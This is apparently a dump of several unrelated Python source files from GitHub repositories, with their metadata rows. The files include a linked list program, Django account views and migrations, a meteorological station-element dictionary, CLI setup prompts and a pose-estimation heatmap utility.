dest_sqs_old = copy.copy(dest_sqs)
dest_sqs = []
src_lines_old = src_lines
src_lines = []
dest_lines_old = dest_lines
dest_lines = []
freqs_old = copy.copy(freqs)
freqs = []
dest_texts_old = copy.copy(dest_texts)
dest_texts = []
src_texts_old = copy.copy(src_texts)
src_texts = []
for i in range(0, len(src_cur)):
if i not in circles_old:
center = pos[pos_taken.index(0)]
print center
circles.append(Circle(Point(center[0], center[1]), max(10, src_freq[src_cur[i]])));
pos_taken[pos_taken.index(0)] = 1
print pos_taken
circles[i].setFill("blue")
circles[i].setOutline("blue")
circles[i].draw(win)
src_sqs.append(Rectangle(Point(center[0]+40, center[1] -75), Point(center[0]-40, center[1] - 100)))
src_sqs[i].setFill("purple")
src_sqs[i].setOutline("purple")
src_sqs[i].draw(win)
dest_sqs.append(Rectangle(Point(center[0]+40, center[1] +75 ), Point(center[0]-40, center[1] +100)))
dest_sqs[i].setFill("purple")
dest_sqs[i].setOutline("purple")
dest_sqs[i].draw(win)
src_lines.append(Line(Point(src_sqs[i].getCenter().getX(), src_sqs[i].getCenter().getY()+15), Point(circles[i].getCenter().getX(), circles[i].getCenter().getY() - circles[i].getRadius())))
src_lines[i].setArrow('last')
src_lines[i].draw(win)
dest_lines.append(Line(Point(dest_sqs[i].getCenter().getX(), dest_sqs[i].getCenter().getY()-15), Point(circles[i].getCenter().getX(), circles[i].getCenter().getY() + circles[i].getRadius())))
dest_lines[i].setArrow('first')
dest_lines[i].draw(win)
src_texts.append(Text(src_sqs[i].getCenter(), str(srcs[src_cur[i]])))
src_texts[i].setSize(8)
src_texts[i].setFill("white")
src_texts[i].draw(win)
dest_texts.append(Text(dest_sqs[i].getCenter(), str(dests[dest_cur[i]])))
dest_texts[i].setSize(8)
dest_texts[i].setFill("white")
dest_texts[i].draw(win)
freqs.append(Text(circles[i].getCenter(), str(src_freq[src_cur[i]] / 1000.0 * 100.0) + "%"))
freqs[i].setFill("white")
freqs[i].draw(win)
update()
time.sleep(1)
| [
"qiuhuilian1991@gmail.com"
] | qiuhuilian1991@gmail.com |
78bdeb60776945af0767cacef1889faf05164dbc | b233b6461bb7af4d8b64275f740668ec3836c51e | /floydNumber.py | 63687fbf853c71be46bf3b0af41370953581666c | [
"MIT"
] | permissive | shubham2704/codes_instagram | 212821128582ba59a4e6405eab1278c2ce2f0937 | c95aab74aabb4af9d4baa5c7b26698d8f77a95eb | refs/heads/master | 2022-11-24T17:51:04.035629 | 2020-08-05T14:43:16 | 2020-08-05T14:43:16 | 269,327,521 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py | n = int(input("Enter the number of rows in floyd's triangle"))
a = 1
for i in range(1,n+1):
for j in range(1,i+1):
print(a,end='')
a+=1
print()
| [
"cool.shubham2704@gmail.com"
] | cool.shubham2704@gmail.com |
b51ac12b70717c54b15760648a95a50bb8013523 | b36c065d9fe10a6a9bf42415f3a716565ba26756 | /old_code/basicdatas/dicts.py | e4c860a52e2b343ae12c7d32c9bedfb1cc78cc21 | [] | no_license | fanghongbin/nmc_met_class | a447255ce43b2b8f33ee2db584e55483ce68d82c | b59e5ab68c47d83c70c0d7081ca23dce72bf8c75 | refs/heads/master | 2022-02-13T05:25:40.201333 | 2019-05-09T06:54:58 | 2019-05-09T06:54:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,942 | py | #!/usr/bin/python3.6
# -*- coding:UTF-8 -*-
import mymethods.str_finder as finder
gds_station_data_element_name_id = {
"经度":1,
"纬度":2,
"测站高度":3,
"测站级别(short)":4,
"测站类型(short)":5,
"气压传感器海拔高度":6,
"温湿传感器离地面高度":7,
"温湿传感器距水面高度":8,
"风速传感器距地面高度":9,
"风传感器距甲板平台高度":10,
"风速传感器距水面高度":11,
"移动平台移动方向":12,
"移动平台移动速度":13,
"海盐传感器距海面深度":14,
"浪高传感器距海面高度":15,
"浮标方位":16,
"总水深":17,
"海面/水面以下深度":18,
"船面距海面高度":19,
"方位或方位角":20,
"字符型站名":21,
"风向":201,
"风速":203,
"1分钟平均风向":205,
"1分钟平均风速":207,
"2分钟平均风向":209,
"2分钟平均风速":211,
"10分钟平均风向":213,
"10分钟平均风速":215,
"最大风速的风向":217,
"最大风速":219,
"瞬时风向":221,
"瞬时风速":223,
"极大风速的风向":225,
"极大风速":227,
"过去6小时极大瞬时风速的风向":229,
"过去6小时极大瞬时风速":231,
"过去12小时极大瞬时风速的风向":233,
"过去12小时极大瞬时风速":235,
"风力(short)":237,
"海平面气压":401,
"3小时变压":403,
"24小时变压":405,
"本站气压":407,
"最高气压":409,
"最低气压":411,
"气压":413,
"日平均气压":415,
"日平均海平面气压":417,
"高度(探空)":419,
"位势高度(探空)":421,
"温度":601,
"最高气温":603,
"最低气温":605,
"24小时变温":607,
"过去24小时最高气温":609,
"过去24小时最低气温":611,
"日平均气温":613,
"露点温度":801,
"温度露点差":803,
"相对湿度":805,
"最小相对湿度":807,
"日平均相对湿度":809,
"水汽压":811,
"日平均水汽压":813,
"降水量":1001,
"1小时降水":1003,
"3小时降水":1005,
"6小时降水":1007,
"12小时降水":1009,
"24小时降水":1011,
"日总降水":1013,
"20-08时降水量":1015,
"08-20时降水量":1017,
"20-20时降水量":1019,
"08-08时降水量":1021,
"蒸发":1023,
"蒸发(大型)":1025,
"可降水分(预报降水量)":1027,
"1分钟平均水平能见度":1201,
"10分钟平均水平能见度":1203,
"最小水平能见度":1205,
"水平能见度(人工)":1207,
"总云量":1401,
"低云量":1403,
"云底高度":1405,
"低云状(short)":1407,
"中云状(short)":1409,
"高云状(short)":1411,
"日平均总云量":1413,
"日平均低云量":1415,
"云量(低云或中云)":1417,
"云类型(short)":1419,
"现在天气(short)":1601,
"过去天气1(short)":1603,
"过去天气2(short)":1605,
"龙卷类型(short)":1801,
"龙卷所在方位(short)":1803,
"最大冰雹直径":1805,
"雷暴(short)":1807,
"电流强度(闪电定位)":1809,
"地面温度":2001,
"最高地面温度":2003,
"最低地面温度":2005,
"过去12小时最低地面温度":2007,
"5cm地温":2009,
"10cm地温":2011,
"15cm地温":2013,
"20cm地温":2015,
"40cm地温":2017,
"80cm地温":2019,
"160cm地温":2021,
"320cm地温":2023,
"草面(雪面)温度":2025,
"草面(雪面)最高温度":2027,
"草面(雪面)最低温度":2029,
"日平均地面温度":2031,
"日平均5cm地温":2033,
"日平均10cm地温":2035,
"日平均15cm地温":2037,
"日平均20cm地温":2039,
"日平均40cm地温":2041,
"日平均80cm地温":2043,
"日平均160cm地温":2045,
"日平均320cm地温":2047,
"日平均草面(雪面)温度":2049,
"地面状态(short)":2201,
"积雪深度":2203,
"雪压":2205,
"电线积冰直径":2207,
"电线积冰-现象(short)":2209,
"电线积冰-南北方向直径":2211,
"电线积冰-南北方向厚度":2213,
"电线积冰-南北方向重量":2215,
"电线积冰-东西方向直径":2217,
"电线积冰-东西方向厚度":2219,
"电线积冰-东西方向重量":2221,
"船上结冰原因(short)":2223,
"船上结冰厚度":2225,
"船上结冰速度(short)":2227,
"海冰密集度(short)":2229,
"冰情发展(short)":2231,
"冰总量和类型(short)":2233,
"冰缘方位":2235,
"冰情(short)":2237,
"最高气压出现时间":10001,
"最低气压出现时间":10003,
"最高气温出现时间":10005,
"最低气温出现时间":10007,
"最小相对湿度出现时间":10009,
"最大风速出现时间":10011,
"极大风速出现时间":10013,
"最高地面温度出现时间":10015,
"最低地面温度出现时间":10017,
"草面(雪面)最低温度出现时间":10019,
"草面(雪面)最高温度出现时间":10021,
"最小水平能见度出现时间":10023,
"天气出现时间":10025,
"海表最高温度出现时间":10027,
"海表最低温度出现时间":10029,
"最大波高出现时间":10031,
"风速表类型":2401,
"湿球温度测量方法":2403,
"海面温度测量方法":2405,
"洋流测量方法":2407,
"气压倾向特征":2409,
"海面温度":2601,
"湿球温度":2603,
"海面盐度":2605,
"海表最高温度":2607,
"海表最低温度":2609,
"海水温度":2611,
"海水盐度":2613,
"海面海流方向":2801,
"海面海流速度":2803,
"洋流方向和速度的平均周期(short)":2805,
"表层海洋面流速":2807,
"表层海洋面波向":2809,
"海流方向":2811,
"海流速度":2813,
"波浪方向":3001,
"波浪周期":3003,
"波浪高度":3005,
"风浪方向":3007,
"风浪周期":3009,
"风浪高度":3011,
"第一涌浪方向":3013,
"第一涌浪周期":3015,
"第一涌浪高度":3017,
"第二涌浪方向":3019,
"第二涌浪周期":3021,
"第二涌浪高度":3023,
"有效波高":3025,
"有效波高的周期":3027,
"平均波高":3029,
"平均波周期":3031,
"最大波高":3033,
"最大波高的周期":3035,
"人工测量浪高":3037,
"仪器测量浪高":3039,
"浪级代码(short)":3041
}
gds_station_data_element_id_name = dict(zip(gds_station_data_element_name_id.values(),gds_station_data_element_name_id.keys()))
def gds_station_data_element_id_finder(input_strs):
ele_names = finder.muti_strs_finder(input_strs,gds_station_data_element_name_id)
names_ids = {}
for names in ele_names:
names_ids[names] = gds_station_data_element_name_id[names]
print(names + " : " + str(names_ids[names]))
return names_ids
class m1_value_column:
站号 = 0
经度 = 1
纬度 = 2
拔海高度 = 3
站点级别 = 4
总云量 =5
风向 = 6
风速 = 7
气压 = 8
小时变压 = 9
过去天气1 = 10
过去天气2 =11
降水6小时 =12
低云状 =13
低云量 =14
低云高 =15
露点 =16
能见度 =17
现在天气 =18
温度 =19
中云状 =20
高云状 =21
标志1 =22
标志2 =23
日变温 = 24
日变压 =25
class m2_value_column:
站号 = 0
经度 = 1
纬度 = 2
拔海高度 = 3
位势高度 = 4
温度 = 5
温度露点差 = 6
风向 = 7
风速 = 8
class m8_value_column:
站号 = 0
经度 = 1
纬度 = 2
拔海高度 = 3
天气现象1 = 4
风向1 = 5
风速1 = 6
最低温度 = 7
最高温度 = 8
天气现象2 = 9
风向2 = 10
风速2 = 11
| [
"liucouhua@163.com"
] | liucouhua@163.com |
1d02c0f0e5fd0054fcf5b645522e66c08cbcd8c7 | 4bbf8034ddc885d7d153625b3f7514cecae512ae | /SINGLY_LINKED_LIST.py | 82840c1e839a2ac7bcc581078d27ce023b998403 | [] | no_license | vampireStromx07/linked-list | 23c3c510205947eb9f35e8c990f3144482f5c56b | 10b45352002d07cad492b126e712e9d7955889ee | refs/heads/master | 2022-12-15T20:34:34.860736 | 2020-09-17T06:52:17 | 2020-09-17T06:52:17 | 296,243,456 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,426 | py | # program for linked list
# SinglyLinkedList
class node: # this will create a node
def __init__(self, data):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None # this will be head node
self.numOfNodes = 0 # this variable shows the sizes of linked list
def insert_first(self, data): # To insert node at the start
new_node = node(data) # this create a node
if self.head is None: # check the head is empty or not
self.head = new_node
self.numOfNodes += 1
else:
new_node.next = self.head
self.head = new_node
self.numOfNodes += 1
def insert_end(self, data): # to create a node at the end
new_node = node(data)
if self.head is None:
self.head = new_node
self.numOfNodes += 1
else:
temp = self.head
while temp.next is not None: # temp node now reaches to the last node
temp = temp.next
temp.next = new_node
self.numOfNodes += 1
def insert_at_pos(self, data, pos):
new_node = node(data)
if self.head is None:
self.head = new_node
else:
count = self.numOfNodes
if 1 <= pos <= count: # check the position is valid or not
self.numOfNodes += 1
if pos == 1:
self.insert_first(data)
elif pos == count:
self.insert_end(data)
else:
temp = self.head
i = 1
while i < pos-1: # now to temp node reaches the nth position (n = pos -1)
temp = temp.next
i += 1
new_node.next = temp.next
temp.next = new_node
else:
print(f"There are {count} nodes in the list.\n "
"Enter a valid position\n")
def remove_first(self):
if self.head is None:
print("There are no nodes in the list.\n") # check the list is empty or not.
elif self.head.next is None: # Only one node is present
self.head = None
else:
temp = self.head # to delete the head node we use temp node
self.head = self.head.next
del temp
self.numOfNodes -= 1
def remove_end(self):
if self.head is None:
print("There are no nodes in the list.\n")
elif self.head.next is None: # Only one node is present
self.head = None
else:
temp = self.head # first we have to reach the last node
prev_node = None # previous node is used to delete the next link of last node
while temp.next is not None:
prev_node = temp
temp = temp.next
prev_node.next = None
del temp # delete the last node
self.numOfNodes -= 1
def remove_with_data(self, data):
temp = self.head
prev_node = None
if self.head is None:
return
while temp is not None and temp.data != data: # we are comparing data with node data
prev_node = temp
temp = temp.next
if temp is None: # it means we could not found the element because last node pointer is null
return
self.numOfNodes -= 1
if prev_node is None: # it means there are only one node present at a time
self.head = temp.next
else:
prev_node.next = temp.next
def Traverse(self):
if self.head is None:
print("LIST IS EMPTY.\n")
else:
temp = self.head
while temp is not None:
print(f"{temp.data} -->", end='')
temp = temp.next
if __name__ == '__main__':
SLL = SinglyLinkedList()
while True:
print("\n<-- Singly Linked List -->\n"
"1. Insert_At_Start\n"
"2. Insert_At_End\n"
"3. Insert_At_Pos\n"
"4. Remove_From_Start\n"
"5. Remove_From_End\n"
"6. Remove_With_Data\n"
"7. Display_List\n"
"8. Exit\n")
print("Enter a choice: ", end='')
choice = int(input())
if choice == 1:
a = input("Enter a data: ")
SLL.insert_first(a)
print("\n")
if choice == 2:
a = input("Enter a data: ")
SLL.insert_end(a)
print('\n')
if choice == 3:
a = input("Enter a data: ")
b = int(input("Enter a position"))
SLL.insert_at_pos(a, b)
if choice == 4:
SLL.remove_first()
if choice == 5:
SLL.remove_end()
if choice == 6:
a = input("Enter Data: ")
SLL.remove_with_data(a)
if choice == 7:
SLL.Traverse()
if choice == 8:
exit()
| [
"noreply@github.com"
] | vampireStromx07.noreply@github.com |
44700434fd4cdec1476966e21bc25efef89394b2 | 314807ffb26beca108ba13287938dd48d94f24ed | /contrato/apps.py | 133fca6783c6c4d61680fd926700c10fefdd282b | [] | no_license | pacok/PruebaEnr | baa1829eafa5aca345e0690110c07b8b22cd18fc | 866409fd982b772fc457062a9c2f7cee7e7e5512 | refs/heads/master | 2020-03-21T11:43:35.879638 | 2018-06-24T22:42:51 | 2018-06-24T22:42:51 | 138,519,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 156 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class ContratoConfig(AppConfig):
name = 'contrato'
| [
"pacocamas85@gmail.com"
] | pacocamas85@gmail.com |
5f2cd0a19c39911ec4ee3506692f2aaf89cb099f | 3d8a2d2124c484a7ac81835296c0a8834af8df6e | /one/prompt/init.py | 7b8fdc2da8a08af92d6fca59fb204653d241e2e2 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | DNXLabs/one-cli | e067a2a9d49c61494abcd9ba4b63626f656cdbb9 | 37265189ab184e6fa7569c201b181ba5d95a0a2a | refs/heads/master | 2022-12-14T09:15:32.052749 | 2021-09-16T00:08:35 | 2021-09-16T00:08:35 | 253,417,937 | 7 | 1 | Apache-2.0 | 2021-09-16T00:08:36 | 2020-04-06T06:51:25 | Python | UTF-8 | Python | false | false | 1,955 | py | from one.docker.image import AZURE_AUTH_IMAGE, GSUITE_AUTH_IMAGE, TERRAFORM_IMAGE
CREATION_QUESTION = [
{
'type': 'input',
'name': 'create',
'message': 'Do you want to create workspaces now? [Y/n]',
'default': 'Y'
}
]
IMAGE_QUESTIONS = [
{
'type': 'input',
'name': 'terraform',
'default': TERRAFORM_IMAGE,
'message': 'Terraform docker image:',
'validate': lambda text: len(text) >= 4 or 'Must be at least 4 character.'
},
{
'type': 'input',
'name': 'gsuite',
'default': GSUITE_AUTH_IMAGE,
'message': 'G Suite docker image:',
'validate': lambda text: len(text) >= 4 or 'Must be at least 4 character.'
},
{
'type': 'input',
'name': 'azure',
'default': AZURE_AUTH_IMAGE,
'message': 'Azure docker image:',
'validate': lambda text: len(text) >= 4 or 'Must be at least 4 character.'
},
]
WORKSPACE_QUESTIONS = [
{
'type': 'input',
'name': 'AWS_ACCOUNT_ID',
'message': 'What\'s your AWS_ACCOUNT_ID credential:',
'validate': lambda text: len(text) >= 1 or 'Must be at least 1 character.'
},
{
'type': 'input',
'name': 'AWS_ROLE',
'message': 'What\'s your AWS_ROLE credential:',
'validate': lambda text: len(text) >= 1 or 'Must be at least 1 character.'
},
{
'type': 'input',
'name': 'WORKSPACE',
'message': 'What\'s your WORKSPACE credential:',
'validate': lambda text: len(text) >= 1 or 'Must be at least 1 character.'
},
{
'type': 'input',
'name': 'assume_role',
'default': 'n',
'message': 'Do you want to this workspace to assume role? [Y/n]'
},
{
'type': 'input',
'name': 'new_workspace',
'default': 'Y',
'message': 'Do you want to create another workspace? [Y/n]'
}
]
| [
"arthurbdiniz@gmail.com"
] | arthurbdiniz@gmail.com |
1e14a12fb0353af32a9218ab79645ee9b390dfb1 | 51554f9c49231e4a0c7a0356456050e927ce2884 | /accounts/views.py | 901b9709e55d1d06d857e863436a139628cc653d | [
"Apache-2.0"
] | permissive | geoffreynyaga/ANGA-UTM | 10a2958e172faad66e414b561ec035a2162571e7 | 68d3033529490d3fb57ac727c8c2a2f77fcffae6 | refs/heads/master | 2022-12-09T18:30:25.622423 | 2022-01-10T18:07:29 | 2022-01-10T18:07:29 | 232,053,896 | 8 | 3 | Apache-2.0 | 2022-11-22T03:59:59 | 2020-01-06T08:10:06 | JavaScript | UTF-8 | Python | false | false | 4,576 | py | from django.shortcuts import render
from django.contrib.auth import login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.models import User
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core.exceptions import PermissionDenied
from django.urls import reverse_lazy
from django.forms.models import inlineformset_factory
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.views import generic
from flight_plans.models import FlightLog
from rpas.models import Rpas
from . import (
forms,
) # TODO: where is this needed? see line below and resolve to use just one in this doc
from .forms import UserForm
from .models import UserProfile
# Create your views here.
class LoginView(generic.FormView):
form_class = AuthenticationForm
success_url = reverse_lazy("view_airspace")
template_name = "accounts/login.html"
def get_form(self, form_class=None):
if form_class is None:
form_class = self.get_form_class()
return form_class(self.request, **self.get_form_kwargs())
def form_valid(self, form):
login(self.request, form.get_user())
return super().form_valid(form)
def logout_view(request):
logout(request)
return HttpResponseRedirect("/account/login")
class SignUp(generic.CreateView):
form_class = forms.UserCreateForm
success_url = reverse_lazy("login")
template_name = "accounts/signup.html"
@login_required() # only logged in users should access this
def edit_user(request, pk):
# querying the User object with pk from url
user = User.objects.get(pk=pk)
# prepopulate UserProfileForm with retrieved user values from above.
user_form = UserForm(instance=user)
# The sorcery begins from here, see explanation below
ProfileInlineFormset = inlineformset_factory(
User,
UserProfile,
fields=(
"phone_number",
"organization",
"bio",
"profile_pic",
"location",
"birth_date",
),
)
formset = ProfileInlineFormset(instance=user)
if request.user.is_authenticated and request.user.id == user.id:
if request.method == "POST":
user_form = UserForm(request.POST, request.FILES, instance=user)
formset = ProfileInlineFormset(request.POST, request.FILES, instance=user)
if user_form.is_valid():
created_user = user_form.save(commit=False)
formset = ProfileInlineFormset(
request.POST, request.FILES, instance=created_user
)
if formset.is_valid():
created_user.save()
formset.save()
# return HttpResponseRedirect('/account/profile/')
return HttpResponseRedirect(
reverse("accounts:view_profile", args=(user.id,))
)
return render(
request,
"accounts/edit_profile.html",
{"noodle": pk, "noodle_form": user_form, "formset": formset},
)
else:
raise PermissionDenied
# class view_profile(generic.TemplateView):
# template_name = "accounts/profile.html"
# # model = UserProfile
#
# def get(self, request):
# myrpas = Rpas.objects.filter(organization = request.user.userprofile.organization)
# myflightlogs = FlightLog.objects.filter(user = request.user)
# args = {'myrpas': myrpas, 'myflightlogs':myflightlogs}
# return render(request, self.template_name ,args)
class ViewProfile(LoginRequiredMixin, generic.DetailView):
template_name = "accounts/profile.html"
model = UserProfile
def get_context_data(self, *args, **kwargs):
context = super(ViewProfile, self).get_context_data(**kwargs)
pk = self.kwargs["pk"]
thisuser = User.objects.get(pk=pk)
org = thisuser.userprofile.organization
context["myrpas"] = Rpas.objects.filter(organization=org)
context["myflightlogs"] = FlightLog.objects.filter(user=thisuser)
return context
def error_404(request, exception):
data = {}
return render(request, "errors/404.html", data)
def error_500(request):
data = {}
return render(request, "errors/500.html", data)
| [
"noreply@github.com"
] | geoffreynyaga.noreply@github.com |
69996a44f24cbfa09ce1c8ed3af02287be65387f | 62d6fae8a4a87a3fcf1f513f59be0fc06bed2cd9 | /B13/A'.py | 1110c59c66c47584ea964310cc61267f93b4adea | [] | no_license | tsub/atcoder | 878bdd3d4f1e4d14245e2604860cd5db548dfea9 | 9f4bd29f89dc2c39146c2fbfe84ed6c4f3d4ade2 | refs/heads/master | 2021-01-02T09:14:15.616037 | 2014-12-13T14:26:44 | 2014-12-13T14:26:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | print ["A", "B", "C", "D", "E"].index(raw_input()) + 1
| [
"nor.known.to.life.51122@gmail.com"
] | nor.known.to.life.51122@gmail.com |
d2a5cb571e2cb8f533bc23fe4059f396c6a4d194 | 1e37b2c02b462689e7468d58cacff1167951294a | /class inherance 2 do 1 1do 2.py | c39deaddc1a49173433b5e60cda82752e56452b1 | [] | no_license | MProMikolajczyk/Python-script | 43f00706959996b1e97980adcba19d47103f4480 | 7512c8b1aac65ba6a652d81dfed301bf2fb7b830 | refs/heads/master | 2023-04-12T23:17:39.195642 | 2019-04-02T13:04:54 | 2019-04-02T13:04:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 528 | py | class Employee(object):
def __init__(self, name):
self.name = name
def greet(self, other):
print "Hello, %s" % other.name
class CEO(Employee):
def greet(self, other):
print "Get back to work, %s!" % other.name
ceo = CEO("Emily") # zdefiniowanie pracownika Emily, wykonanie polecenia init
emp = Employee("Steve") #zdefiniowanie pracowanika Steve wykoanie poleceni init
emp.greet(ceo) # Pracownik Emily ma zrobić do co w klasie Employee w greet
ceo.greet(emp) # Pracownik Steve ma zrobić to co w clasie CEO
| [
"marekmikolajczyk87@gmail.com"
] | marekmikolajczyk87@gmail.com |
fa09ff4b64386bcb5a0fe8d33436793ee2d37e6b | 633ae9d33ca81991b18c589abf246bec3dbec33c | /eventex/subscriptions/migrations/0001_initial.py | de9bbee8f210ce81ebabfd82161bee80a6d35566 | [] | no_license | izaguerreiro/eventex | e2b812ffdac26b820d957d7b35121b27f802e20b | d8ead2d5a906a39cdaa55ffa6949321cd56fd1b9 | refs/heads/master | 2016-08-10T20:18:36.781515 | 2016-03-06T19:05:43 | 2016-03-06T19:05:43 | 49,826,462 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 807 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-02-07 16:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Subscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('cpf', models.CharField(max_length=11)),
('email', models.EmailField(max_length=254)),
('phone', models.CharField(max_length=20)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"izaguerreiro@gmail.com"
] | izaguerreiro@gmail.com |
daeade6f715afe5c0ed4936a572a5099f1f1ffce | 0c773120fa14e2ff192139adc151c45b8056bb91 | /ssrnai/views/percevejo/percevejo_sequence.py | ac6f07b4c996e563ca0546d77a2aede0faa20b38 | [] | no_license | marcelo-soares-souza/gbp | b9c7c575c8ed0e52859011c28037037a7f9629b0 | 24c1945f162eb0f5f7f62379fafea37755b74fa0 | refs/heads/master | 2021-12-02T10:58:46.169309 | 2021-11-24T13:16:25 | 2021-11-24T13:16:25 | 92,402,805 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 870 | py | from django.views.generic import DetailView
from ssrnai.models.percevejo.percevejo_dsrna_information import PercevejoDsrnaInformation
from ssrnai.models.percevejo.percevejo_gene_information import Percevejo_Gene_Information
from ssrnai.models import Database
class PercevejoSequence(DetailView):
template_name = 'percevejo/percevejo_sequence.html'
context_object_name = 'sequence'
model = PercevejoDsrnaInformation
fields = '__all__'
def get_context_data(self, **kwargs):
context = super(PercevejoSequence, self).get_context_data(**kwargs)
context['dsrna'] = PercevejoDsrnaInformation.objects.get(id=int(self.kwargs['pk']))
dsrna = context['dsrna']
context['gene'] = Percevejo_Gene_Information.objects.get(id=int(dsrna.gene_id))
context['database'] = Database.objects.get(id=int(5))
return context
| [
"doglasparise@gmail.com"
] | doglasparise@gmail.com |
ece9f316a0fefeadcadb2e990278059d95d89c1d | dfd9242399e5ab22c6bc1001d85d40a188b6e9c8 | /base.py | 27609ea14551d69608b4189ba898fb5271e6270d | [
"MIT"
] | permissive | OwenLeng/PathFakeGit | 790f3fa42e31214df5f83b62fe29873bd280a166 | 908326efd46c31f2b7b7837f0a5f4b557eb99f78 | refs/heads/main | 2023-03-29T05:36:31.976608 | 2021-04-02T10:11:50 | 2021-04-02T10:11:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 796 | py | # 一些基础常见的代码
from config import *
import random
import numpy as np
# 为随机数产生函数设置固定种子,便于实验复现
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
# 根据max_len为列表补齐,如果没有指定max_len,则根据数据自动计算
def pad_zero(lst, max_len=-1):
if max_len == -1:
for i in lst:
max_len = max(max_len, len(i))
for cnt in range(len(lst)):
lst[cnt] = lst[cnt] + [0] * (max_len - len(lst[cnt]))
# 截断过长的部分;当max-len是手动设置的参数时,需要截断长度超过的部分
lst[cnt] = lst[cnt][:max_len]
return lst
| [
"zperfet007@gmail.com"
] | zperfet007@gmail.com |
910d4ad967a26c438eceeb266e4f0d924120ea93 | 592729cad6ab341e2abd1bb1055e8ac99dcf0784 | /src/differentiation/types/Expression.py | 25f008c789dee3ddbbf942a40f13147f14fc33a6 | [
"MIT"
] | permissive | YihanKim/derivative | 8240fdea8b0830014750ae51e624cc896f88d048 | 2865a82388efb04decedab09a05a99b06aed933f | refs/heads/master | 2020-04-29T04:05:41.230312 | 2019-03-15T16:42:41 | 2019-03-15T16:42:41 | 175,835,556 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | from abc import *
class Expression(object):
@abstractmethod
def __init__(self, value):
self.type = "expression"
@abstractmethod
def __repr__(self):
return ""
@abstractmethod
def evaluate(self, env: dict):
return 0
@abstractmethod
def gradient(self, var: str):
return Number(0)
@abstractmethod
def reduce(self):
return self
| [
"kabi@kaist.ac.kr"
] | kabi@kaist.ac.kr |
0177cede3a8b28b7b2aff2d72fce4ffb56adc509 | 4a2812a69059c7c5905e7aa70026d6863d046f7f | /gdp.py | 2e861951f6a944d03a6ff25b15553bf2ced28e1c | [] | no_license | cuilji/learn-py | 9a9b67f4e5cc87ee3d0f1f2cb46d1dc4ce0d5be4 | d867d6d2ecfa0099f1aa0548ac2ff3855495de10 | refs/heads/master | 2020-06-07T17:31:37.751772 | 2018-10-09T10:50:32 | 2018-10-09T10:50:32 | 14,684,308 | 0 | 0 | null | null | null | null | GB18030 | Python | false | false | 194 | py | # -*- coding: utf-8 -*-
#2000年gdp10万亿元
#unit 亿元
gdp=340903
#Year2017gdp=827122
for year in range(2010, 2046):
print('Year' + str(year) +':'+ str(gdp*1.08))
gdp=gdp*1.1
| [
"cuilji@163.com"
] | cuilji@163.com |
9791a65f02a98f974e83315b8ae98a66d0308a9d | 74b667802f795a45743c390511dac4deb05a56b6 | /src/ltpl/associate_embedding/ae.py | 373fa63d3dbfb80f793d2c77ef4c3472d9c300a0 | [
"BSD-2-Clause"
] | permissive | DuinoDu/ltpl | fe7b4d5dc429638e644d88ee14e7b22c1ada54d1 | d5bacaed539f2118b8054c58afedfc4ca8dc6ba6 | refs/heads/master | 2021-01-02T18:30:21.577452 | 2020-02-11T11:20:09 | 2020-02-11T11:20:09 | 239,744,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,758 | py | # -*- coding: utf-8 -*-
"""label-target-predict convert utility in pose task"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
__all__ = ['Encoder', 'Decoder']
class GenerateHeatmap():
"""
ported from https://github.com/princeton-vl/pose-ae-train
"""
def __init__(self, num_parts, sigma, keep_invis, output_res=None):
self.output_res = output_res # [h, w]
self.num_parts = num_parts
self.keep_invis = keep_invis
self.sigma = sigma # self.output_res/64
size = 6 * sigma + 3
x = np.arange(0, size, 1, float)
y = x[:, np.newaxis]
x0, y0 = 3*sigma + 1, 3*sigma + 1
self.g = np.exp(- ((x - x0) ** 2 + (y - y0) ** 2) / (2 * sigma ** 2))
def __call__(self, keypoints, output_res=None):
if output_res is None:
output_res = self.output_res
assert output_res is not None
hms = np.zeros(shape = (self.num_parts, self.output_res[0], self.output_res[1]), dtype = np.float32)
hms_weight = np.zeros_like(hms)
sigma = self.sigma
for p in keypoints:
for idx, pt in enumerate(p):
if (self.keep_invis and pt[2] == 0.0) or ( (not self.keep_invis) and pt[2] == 2.0):
continue
x, y = int(pt[0]), int(pt[1])
if x<0 or y<0 or x>=self.output_res[1] or y>=self.output_res[0]:
continue
ul = int(x - 3*sigma - 1), int(y - 3*sigma - 1)
br = int(x + 3*sigma + 2), int(y + 3*sigma + 2)
c,d = max(0, -ul[0]), min(br[0], self.output_res[1]) - ul[0]
a,b = max(0, -ul[1]), min(br[1], self.output_res[0]) - ul[1]
cc,dd = max(0, ul[0]), min(br[0], self.output_res[1])
aa,bb = max(0, ul[1]), min(br[1], self.output_res[0])
hms[idx, aa:bb,cc:dd] = np.maximum(hms[idx, aa:bb,cc:dd], self.g[a:b,c:d])
hms_weight[idx, :, :] = 1.0
return hms, hms_weight
class KeypointsRef():
"""
ported from https://github.com/princeton-vl/pose-ae-train
"""
